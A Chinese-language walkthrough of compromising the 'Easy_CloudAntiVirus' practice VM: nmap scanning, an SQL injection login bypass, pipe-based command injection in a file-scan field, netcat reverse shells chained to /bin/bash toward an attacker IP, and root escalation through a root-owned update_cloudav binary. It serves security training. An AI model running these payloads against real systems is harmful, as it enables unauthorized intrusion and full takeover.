Easy_CloudAntiVirus靶机渗透过程
准备环境
攻击机:WSL-Kali-Linux
目标靶机:Easy_CloudAntiVirus
平台:VMware Workstation 16.2
靶机为NAT
模式
一、信息搜集
1.主机嗅探
- 在第一次启动靶机时,靶机并没有获取到
IP
,在虚拟机的启动界面,GRUB
引导页按E
键,在以linux
开头的那行末尾加上rw signie init=/bin/bash
,再Ctrl+X
启动。进入系统之后手动更改网络配置即可
可得到靶机IP
为192.168.9.137
2.端口扫描
放进kali
一把梭
nmap -A -p- 192.168.9.137
该靶机开放的端口情况如下
端口号 | 服务 |
---|---|
22 | OpenSSH |
8080 | Httpd |
3.目录扫描
先访问其web
服务
是一个病毒检测扫描的网站服务,有一个输入邀请码的文本框,推断可能存在SQL注入
通过目录扫描,发现还存在console
目录
访问console页面提示输入PIN
码
console
页面先放一放
二、漏洞利用
1.SQL注入
先测试注入类型,当输入1
或1'
时,都回显
当输入1"
时,回显数据库报错信息
根据报错信息,可以得知邀请码输入框的SQL
语句为select * from code where password="' + password + '"
,由双引号(""
)来隔断,由此可以构造payload
:1" or 1=1 --+
2.反弹shell
进入到web
的scan
目录,列出了当前目录下的存在文件,在输入框内输入hello
可得到hello
文件备扫描的结果
推测存在命令执行,执行语句应该是XXXX(病毒扫描命令) 文件名
,可以通过管道符注入命令,查询是否存在nc
|which nc
存在nc,可以直接获取反弹shell
,构造payload
:|nc 172.22.228.35 3333
拿到反弹shell
之后,执行命令会等待一段时间,可尝试使用nc
串联
|nc 172.22.228.35 3333|/bin/bash|nc 172.22.228.35 4444
在3333
端口执行命令,4444
端口会显示回显
查看当前用户
whoami
得回显是scanner
,查看该系统存在哪些用户
cat /etc/passwd
一共存在root
、cloudav
、scanner
这三个用户
在/home/scanner
下存在两个可疑文件
3.提权
存在update_cloudav
和update_cloudav.c
文件,其中update_cloudav
的所有者是root
通过查看update_cloudav
文件内容,可以得知执行update_cloudav
时需要在后面加命令
即./update_cloudav "XXXX"
试着使用update_cloudav
提权,建立nc
./update_cloudav "a|nc 172.22.228.35 5555|/bin/bash|nc 172.22.228.35 6666"
成功拿到root
权限